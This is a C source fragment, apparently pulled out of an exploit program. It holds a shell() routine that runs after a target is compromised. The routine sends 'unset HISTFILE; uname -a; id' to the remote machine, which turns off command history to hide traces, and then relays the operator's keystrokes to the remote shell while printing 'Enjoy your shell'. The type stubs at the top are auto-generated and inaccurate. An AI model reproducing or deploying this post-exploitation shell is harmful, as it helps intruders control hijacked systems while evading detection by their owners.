
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;
typedef int buf ;


 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int perror (char*) ;
 int printf (char*) ;
 int read (int ,char*,int) ;
 int recv (int,char*,int,int ) ;
 scalar_t__ select (int,int *,int *,int *,int *) ;
 scalar_t__ send (int,char*,int,int ) ;
 int strlen (char*) ;
 scalar_t__ write (int,char*,int) ;

__attribute__((used)) static void
shell (int sock)
{
    fd_set fds;
    char *cmd = "unset HISTFILE; /bin/uname -a; /usr/bin/id\n";
    char buf [2048];
    int n;

    printf ("[-] Enjoy your shell\n");
    printf ("\n");


    send (sock, cmd, strlen (cmd), 0);

    while (1)
    {
 FD_ZERO (&fds);
 FD_SET (sock, &fds);
 FD_SET (0, &fds);

 if (select (sock + 1, &fds, ((void*)0), ((void*)0), ((void*)0)) < 0)
     break;

 if (FD_ISSET (sock, &fds))
 {
     if ((n = recv (sock, buf, sizeof (buf), 0)) < 0)
     {
  perror ("[-] shell(): error reading from socket: recv()");
  return;
     }

     if (n == 0)
  break;

     if ((write (1, buf, n)) < 0)
     {
  perror ("[-] shell(): error writing to stdout: write()");
  return;
     }
 }

 if (FD_ISSET (0, &fds))
 {
     if ((n = read (0, buf, sizeof (buf))) < 0)
     {
  perror ("[-] shell(): error reading from stdin: read()");
  return;
     }

     if ((send (sock, buf, n, 0)) < 0)
     {
  perror ("[-] shell(): error writing to socket: send()");
  return;
     }

     if (n == 0)
  break;
 }
    }

    printf ("[-] Connection closed.\n");
}
